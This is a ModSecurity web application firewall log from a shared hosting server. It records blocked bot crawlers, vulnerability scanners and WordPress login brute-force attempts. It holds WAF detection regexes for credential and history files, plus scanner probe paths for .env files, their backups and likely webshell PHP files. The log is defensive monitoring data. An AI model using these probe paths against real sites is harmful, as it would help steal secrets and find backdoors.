[Tue May 26 15:24:43.079421 2026] [security2:error] [pid 707292:tid 707532] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt4tKAqlRPSIEFAut3HAAAAPM"]
[Tue May 26 15:24:44.371115 2026] [security2:error] [pid 707292:tid 707469] [client 85.208.96.202:10680] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2024-03-12/"] [unique_id "ahVt5NKAqlRPSIEFAut3RgAAALQ"]
[Tue May 26 15:24:44.371243 2026] [security2:error] [pid 707292:tid 707469] [client 85.208.96.202:10680] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-january/day/2024-03-12/"] [unique_id "ahVt5NKAqlRPSIEFAut3RgAAALQ"]
[Tue May 26 15:24:44.722119 2026] [security2:error] [pid 707292:tid 707463] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt5NKAqlRPSIEFAut3RQAAAK4"]
[Tue May 26 15:24:45.470657 2026] [security2:error] [pid 707292:tid 707491] [client 172.202.92.73:59591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/css.php"] [unique_id "ahVt5dKAqlRPSIEFAut3aQAAAMo"]
[Tue May 26 15:24:45.470795 2026] [security2:error] [pid 707292:tid 707491] [client 172.202.92.73:59591] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/css.php"] [unique_id "ahVt5dKAqlRPSIEFAut3aQAAAMo"]
[Tue May 26 15:24:45.527061 2026] [security2:error] [pid 707292:tid 707474] [client 45.132.227.34:60007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVt5dKAqlRPSIEFAut3aAAAALk"]
[Tue May 26 15:24:47.443676 2026] [security2:error] [pid 707292:tid 707544] [client 172.202.92.73:59637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/classwithtostring.php"] [unique_id "ahVt59KAqlRPSIEFAut3lwAAAP8"]
[Tue May 26 15:24:47.443864 2026] [security2:error] [pid 707292:tid 707544] [client 172.202.92.73:59637] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/classwithtostring.php"] [unique_id "ahVt59KAqlRPSIEFAut3lwAAAP8"]
[Tue May 26 15:24:47.452220 2026] [security2:error] [pid 707292:tid 707488] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt5tKAqlRPSIEFAut3jQAAAMc"]
[Tue May 26 15:24:49.862559 2026] [security2:error] [pid 707292:tid 707497] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt6dKAqlRPSIEFAut34AAAANA"]
[Tue May 26 15:24:50.125898 2026] [security2:error] [pid 707292:tid 707524] [client 168.119.53.160:47604] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVt6dKAqlRPSIEFAut35wAAAOs"], referer: https://thegoodsporting.com
[Tue May 26 15:24:50.131471 2026] [security2:error] [pid 707292:tid 707535] [client 85.208.96.197:16598] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahVt6tKAqlRPSIEFAut3_AAAAPY"]
[Tue May 26 15:24:50.131580 2026] [security2:error] [pid 707292:tid 707535] [client 85.208.96.197:16598] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/robots.txt"] [unique_id "ahVt6tKAqlRPSIEFAut3_AAAAPY"]
[Tue May 26 15:24:50.377745 2026] [security2:error] [pid 707292:tid 707443] [client 85.208.96.195:33464] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahVt6tKAqlRPSIEFAut4BAAAAJo"]
[Tue May 26 15:24:50.377832 2026] [security2:error] [pid 707292:tid 707443] [client 85.208.96.195:33464] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahVt6tKAqlRPSIEFAut4BAAAAJo"]
[Tue May 26 15:24:50.778427 2026] [security2:error] [pid 707292:tid 707441] [client 47.128.46.74:24186] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/medias/674-a-tiny-african-island-nation-will-run-on-100-renewable-energy-in-less-than-a-decade"] [unique_id "ahVt6tKAqlRPSIEFAut4FQAAAJg"]
[Tue May 26 15:24:51.125030 2026] [security2:error] [pid 707292:tid 707426] [client 172.202.92.73:59598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/aa.php"] [unique_id "ahVt69KAqlRPSIEFAut4HAAAAIk"]
[Tue May 26 15:24:51.125130 2026] [security2:error] [pid 707292:tid 707426] [client 172.202.92.73:59598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/aa.php"] [unique_id "ahVt69KAqlRPSIEFAut4HAAAAIk"]
[Tue May 26 15:24:51.225216 2026] [security2:error] [pid 707292:tid 707503] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt6tKAqlRPSIEFAut4FAAAANY"]
[Tue May 26 15:24:51.888796 2026] [security2:error] [pid 707292:tid 707537] [client 216.73.217.177:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahVt6NKAqlRPSIEFAut3yAAA-GE"]
[Tue May 26 15:24:51.963580 2026] [security2:error] [pid 707292:tid 707405] [remote 45.250.255.226:47802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVt69KAqlRPSIEFAut4MQAA13A"]
[Tue May 26 15:24:52.843272 2026] [security2:error] [pid 707292:tid 707488] [client 74.7.175.150:57412] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.besglam.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVt7NKAqlRPSIEFAut4TAAAx24"]
[Tue May 26 15:24:53.162523 2026] [security2:error] [pid 707292:tid 707518] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt7NKAqlRPSIEFAut4RgAAAOU"]
[Tue May 26 15:24:53.264519 2026] [autoindex:error] [pid 707292:tid 707388] [remote 74.7.241.14:50894] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:24:53.788966 2026] [security2:error] [pid 707292:tid 707473] [client 172.202.92.73:59590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/0x.php"] [unique_id "ahVt7dKAqlRPSIEFAut4ZQAAALg"]
[Tue May 26 15:24:53.789110 2026] [security2:error] [pid 707292:tid 707473] [client 172.202.92.73:59590] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/0x.php"] [unique_id "ahVt7dKAqlRPSIEFAut4ZQAAALg"]
[Tue May 26 15:24:55.946309 2026] [security2:error] [pid 707292:tid 707513] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt79KAqlRPSIEFAut4lAAAAOA"]
[Tue May 26 15:24:56.309774 2026] [security2:error] [pid 707292:tid 707520] [client 20.29.64.60:3142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVt8NKAqlRPSIEFAut4oQAAAOc"], referer: www.google.com
[Tue May 26 15:24:56.315787 2026] [security2:error] [pid 707292:tid 707472] [client 20.29.64.60:3139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-plain.php"] [unique_id "ahVt8NKAqlRPSIEFAut4owAAALc"], referer: www.google.com
[Tue May 26 15:24:56.669602 2026] [security2:error] [pid 707292:tid 707484] [client 172.202.92.73:59613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/k.php"] [unique_id "ahVt8NKAqlRPSIEFAut4rgAAAMM"]
[Tue May 26 15:24:56.669719 2026] [security2:error] [pid 707292:tid 707484] [client 172.202.92.73:59613] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/k.php"] [unique_id "ahVt8NKAqlRPSIEFAut4rgAAAMM"]
[Tue May 26 15:24:56.993914 2026] [security2:error] [pid 707292:tid 707483] [client 20.29.64.60:3147] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVt8NKAqlRPSIEFAut4pAAAAMI"], referer: www.google.com
[Tue May 26 15:24:57.241149 2026] [security2:error] [pid 707292:tid 707505] [client 20.29.64.60:3140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVt8dKAqlRPSIEFAut4uwAAANg"]
[Tue May 26 15:24:57.383537 2026] [security2:error] [pid 707292:tid 707450] [client 20.29.64.60:3147] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVt8dKAqlRPSIEFAut4vAAAAKE"], referer: www.google.com
[Tue May 26 15:24:57.860914 2026] [security2:error] [pid 707292:tid 707530] [client 172.202.92.73:46156] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/o.php"] [unique_id "ahVt8dKAqlRPSIEFAut40wAAAPE"]
[Tue May 26 15:24:57.861024 2026] [security2:error] [pid 707292:tid 707530] [client 172.202.92.73:46156] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/o.php"] [unique_id "ahVt8dKAqlRPSIEFAut40wAAAPE"]
[Tue May 26 15:24:57.980648 2026] [security2:error] [pid 707292:tid 707464] [client 14.252.44.169:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt8dKAqlRPSIEFAut4xgAAAK8"]
[Tue May 26 15:24:58.191913 2026] [security2:error] [pid 707292:tid 707441] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt8dKAqlRPSIEFAut4zQAAAJg"]
[Tue May 26 15:24:58.761284 2026] [security2:error] [pid 707292:tid 707496] [client 31.57.184.107:52852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "midrivermarina.com"] [uri "/wp-login.php"] [unique_id "ahVt8tKAqlRPSIEFAut46QAAAM8"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 15:24:59.116033 2026] [security2:error] [pid 707292:tid 707459] [client 31.57.184.107:53471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "midrivermarina.com"] [uri "/wp-login.php"] [unique_id "ahVt89KAqlRPSIEFAut48gAAAKo"], referer: https://duckduckgo.com/
[Tue May 26 15:25:00.043658 2026] [security2:error] [pid 707292:tid 707541] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt89KAqlRPSIEFAut5BQAAAPw"]
[Tue May 26 15:25:00.379541 2026] [security2:error] [pid 707292:tid 707467] [client 172.202.92.73:46164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/bb.php"] [unique_id "ahVt9NKAqlRPSIEFAut5IAAAALI"]
[Tue May 26 15:25:00.379664 2026] [security2:error] [pid 707292:tid 707467] [client 172.202.92.73:46164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/bb.php"] [unique_id "ahVt9NKAqlRPSIEFAut5IAAAALI"]
[Tue May 26 15:25:01.590805 2026] [security2:error] [pid 707292:tid 707511] [client 172.202.92.73:59623] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 73.92.202.172.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.sbvschools.com"] [uri "/rip.php"] [unique_id "ahVt9dKAqlRPSIEFAut5OgAAAN4"]
[Tue May 26 15:25:01.590900 2026] [security2:error] [pid 707292:tid 707511] [client 172.202.92.73:59623] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcalendars.sbvschools.com"] [uri "/rip.php"] [unique_id "ahVt9dKAqlRPSIEFAut5OgAAAN4"]
[Tue May 26 15:25:02.024723 2026] [security2:error] [pid 707292:tid 707318] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.docker/.env"] [unique_id "ahVt9tKAqlRPSIEFAut5TAAAuxk"]
[Tue May 26 15:25:02.055950 2026] [security2:error] [pid 707292:tid 707315] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVt9tKAqlRPSIEFAut5TgAAsxY"]
[Tue May 26 15:25:02.176901 2026] [security2:error] [pid 707292:tid 707307] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env"] [unique_id "ahVt9tKAqlRPSIEFAut5UwAArA4"]
[Tue May 26 15:25:02.253962 2026] [security2:error] [pid 707292:tid 707430] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVt9dKAqlRPSIEFAut5RgAAAI0"]
[Tue May 26 15:25:02.367099 2026] [security2:error] [pid 707292:tid 707329] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.backup"] [unique_id "ahVt9tKAqlRPSIEFAut5XgAAqSQ"]
[Tue May 26 15:25:02.402677 2026] [security2:error] [pid 707292:tid 707317] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.bak"] [unique_id "ahVt9tKAqlRPSIEFAut5YAAA6hg"]
[Tue May 26 15:25:02.849764 2026] [security2:error] [pid 707292:tid 707375] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.old"] [unique_id "ahVt9tKAqlRPSIEFAut5eQAA4lI"]
[Tue May 26 15:25:02.875230 2026] [security2:error] [pid 707292:tid 707351] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.php"] [unique_id "ahVt9tKAqlRPSIEFAut5ewAAqDo"]
[Tue May 26 15:25:03.144724 2026] [security2:error] [pid 707292:tid 707376] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env.swp"] [unique_id "ahVt99KAqlRPSIEFAut5hQAA2FM"]
[Tue May 26 15:25:03.264963 2026] [security2:error] [pid 707292:tid 707346] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env~"] [unique_id "ahVt99KAqlRPSIEFAut5jgAAljU"]
[Tue May 26 15:25:03.294931 2026] [security2:error] [pid 707292:tid 707357] [remote 195.178.110.199:59060] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.sevenstar.onesoft.in"] [uri "/.env"] [unique_id "ahVt99KAqlRPSIEFAut5kwAA4UA"]
